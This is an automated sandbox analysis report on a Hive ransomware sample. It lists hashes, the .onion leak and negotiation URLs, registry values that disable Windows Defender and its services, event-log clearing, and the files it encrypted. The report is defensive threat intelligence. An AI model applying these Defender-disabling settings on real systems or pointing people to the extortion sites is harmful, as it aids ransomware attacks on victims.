Analysis
-
max time kernel
173s -
max time network
171s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2025, 22:11
Static task
static1
Behavioral task
behavioral1
Sample
Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.7z
Resource
win10v2004-20250314-en
General
-
Target
Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.7z
-
Size
877KB
-
MD5
8bfde4cd67622b8ac75e1f948214026f
-
SHA1
df768ba61f479bd483122ef0deca7d8e977b0674
-
SHA256
d4e8c5cd03b3bfe1743c7e0c82e6c9694e861b2f6907b4fbc11f83bb0623e55e
-
SHA512
0fbc132e7503aa93f31e25cd07918d6ff2ad63155bc6053fdccf9e30c51e8be98dccac5b0ffb1fcc4006a5676db27631934613174f2c10846768545539b41c99
-
SSDEEP
24576:TPPUy/Jx0qMJfHwUKh/ebyxTDlLu7XQPGu/gnm:TPMrTfoYmrC8PGu/+m
Malware Config
Extracted
C:\Program Files\7-Zip\Lang\phLK_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 400 wevtutil.exe 2432 wevtutil.exe 3576 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2716 bcdedit.exe 2516 bcdedit.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 112 3036 chrome.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation tor-browser-windows-x86_64-portable-14.0.9.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation firefox.exe -
Executes dropped EXE 16 IoCs
pid Process 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 3248 tor-browser-windows-x86_64-portable-14.0.9.exe 3792 firefox.exe 4860 firefox.exe 3100 firefox.exe 3604 firefox.exe 2876 tor.exe 4516 firefox.exe 5128 firefox.exe 2304 firefox.exe 2440 firefox.exe 1964 firefox.exe 4576 firefox.exe 3488 firefox.exe 5204 firefox.exe 4384 firefox.exe -
Loads dropped DLL 64 IoCs
pid Process 3248 tor-browser-windows-x86_64-portable-14.0.9.exe 3248 tor-browser-windows-x86_64-portable-14.0.9.exe 3248 tor-browser-windows-x86_64-portable-14.0.9.exe 3792 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 3100 firefox.exe 3100 firefox.exe 3100 firefox.exe 3100 firefox.exe 3100 firefox.exe 3604 firefox.exe 3604 firefox.exe 3604 firefox.exe 3604 firefox.exe 3604 firefox.exe 4516 firefox.exe 4516 firefox.exe 4516 firefox.exe 4516 firefox.exe 4516 firefox.exe 5128 firefox.exe 5128 firefox.exe 5128 firefox.exe 5128 firefox.exe 5128 firefox.exe 2304 firefox.exe 2304 firefox.exe 2304 firefox.exe 2304 firefox.exe 2304 firefox.exe 2304 firefox.exe 2304 firefox.exe 4516 firefox.exe 4516 firefox.exe 2440 firefox.exe 2440 firefox.exe 2440 firefox.exe 2440 firefox.exe 2440 firefox.exe 1964 firefox.exe 4576 firefox.exe 1964 firefox.exe 1964 firefox.exe 1964 firefox.exe 1964 firefox.exe 4576 firefox.exe 4576 firefox.exe 4576 firefox.exe 4576 firefox.exe 4576 firefox.exe 4576 firefox.exe 1964 firefox.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe -
pid Process 3944 powershell.exe 1792 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS\msipc.dll.mui.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_ugGhtoPeBfk0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LHANDW.TTF.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_T7hmqeI1_2M0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-40.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\contacts_permission_uwp.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\PaintSplashScreen.scale-150.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookSmallTile.scale-400.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\SmallTile.scale-100.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase.Component.winmd Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de.gif.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_OM1IQGVXlD00.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Trial-ppd.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_3GdA1ioNaVE0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_QHVQBFqQvZA0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_contrast-black.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-150_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\jsaddins\onenote_strings.js Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-150.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-100.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_cj2Tk3-hwbs0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\LibrarySquare71x71Logo.scale-125_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-IN\en-IN_female_TTS\ruleset_en-IN_TTS.lua Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-250.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_4ac1sb5__9k0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaremr.dll.mui Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_Dq5MZpXUwbU0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-125_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Skull.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-150_contrast-black.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsWideTile.contrast-white_scale-200.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_6cLYi7Nc8dw0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-125_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_contrast-white.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\THMBNAIL.PNG.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_6UTOpvMLWJE0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav.xml Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-200.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\move.svg.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_JQq2iVZBHEQ0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_N_RaiNCM4Wo0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\msado60.tlb Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-black_scale-200.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarMediumTile.scale-150.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_WIt5cMv34JY0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_xoFVjMp4h3E0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\RunningLate.scale-64.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-16_altform-lightunplated.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_fSy2_x_VYsI0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_ovUzIHx9t2c0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\phLK_HOW_TO_DECRYPT.txt Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_SC6qh4W0Yjc0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_TpY2_vCogGY0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_NflnkfAbZzA0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_0aAPSXpnl4k0.vck99 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsptb.xml Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2780 sc.exe 6096 sc.exe 2932 sc.exe 5212 sc.exe 5132 sc.exe 1240 sc.exe 4472 sc.exe 1596 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4548 PING.EXE 1196 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
